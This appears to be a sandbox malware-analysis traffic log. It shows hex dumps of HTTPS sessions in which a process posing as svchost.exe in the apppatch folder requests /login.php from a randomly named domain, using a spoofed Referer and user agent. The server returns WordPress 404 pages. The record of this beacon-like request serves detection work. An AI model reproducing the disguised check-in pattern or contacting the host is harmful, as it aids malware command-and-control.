                                                                                                                                                                                                          2024-11-11 17:25:56 UTC410INData Raw: 37 63 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                          Data Ascii: 7c9e<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                          2024-11-11 17:25:56 UTC1369INData Raw: 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09
                                                                                                                                                                                                          Data Ascii: ;}</style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" />
                                                                                                                                                                                                          2024-11-11 17:25:56 UTC1369INData Raw: 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30
                                                                                                                                                                                                          Data Ascii: s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0
                                                                                                                                                                                                          2024-11-11 17:25:56 UTC1369INData Raw: 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                                                                                                                                                                                          Data Ascii: "undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var
                                                                                                                                                                                                          2024-11-11 17:25:56 UTC1369INData Raw: 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f
                                                                                                                                                                                                          Data Ascii: ce||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/
                                                                                                                                                                                                          2024-11-11 17:25:56 UTC1369INData Raw: 61 64 65 72 20 2e 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32
                                                                                                                                                                                                          Data Ascii: ader .site-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2
                                                                                                                                                                                                          2024-11-11 17:25:56 UTC1369INData Raw: 3d 72 61 6e 67 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73
                                                                                                                                                                                                          Data Ascii: =range]::-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links
                                                                                                                                                                                                          2024-11-11 17:25:56 UTC1369INData Raw: 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73
                                                                                                                                                                                                          Data Ascii: ntry-content .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-pos
                                                                                                                                                                                                          2024-11-11 17:25:56 UTC1369INData Raw: 63 75 73 2d 76 69 73 69 62 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69
                                                                                                                                                                                                          Data Ascii: cus-visible,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,i


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          12192.168.2.853543188.114.96.34431736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-11-11 17:25:57 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-11-11 17:25:58 UTC949INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:58 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3uzluE%2B5GVqzzY2kY8vJvXK4WazQ5i0dF51uloPWmsOqWjIlA8Q7rB88OEc4foIrLrO1ygkx71D9HS%2BY%2FqOIopG8qWPHZ5R02uEgUgg8fhN%2FquO1rvC4TyTrboNdqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffc0a4e164325-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1198&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2456318&cwnd=251&unsent_bytes=0&cid=71331d2500b9e766&ts=781&x=0"
                                                                                                                                                                                                          2024-11-11 17:25:58 UTC420INData Raw: 37 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                          Data Ascii: 7ca8<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                          2024-11-11 17:25:58 UTC1369INData Raw: 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70
                                                                                                                                                                                                          Data Ascii: yle><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta prop
                                                                                                                                                                                                          2024-11-11 17:25:58 UTC1369INData Raw: 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e
                                                                                                                                                                                                          Data Ascii: on c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.
                                                                                                                                                                                                          2024-11-11 17:25:58 UTC1369INData Raw: 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61
                                                                                                                                                                                                          Data Ascii: "!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.pa
                                                                                                                                                                                                          2024-11-11 17:25:58 UTC1369INData Raw: 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d
                                                                                                                                                                                                          Data Ascii: ncatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/m
                                                                                                                                                                                                          2024-11-11 17:25:58 UTC1369INData Raw: 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77
                                                                                                                                                                                                          Data Ascii: -description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-w
                                                                                                                                                                                                          2024-11-11 17:25:58 UTC1369INData Raw: 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74
                                                                                                                                                                                                          Data Ascii: webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next
                                                                                                                                                                                                          2024-11-11 17:25:58 UTC1369INData Raw: 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63
                                                                                                                                                                                                          Data Ascii: nt .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-c
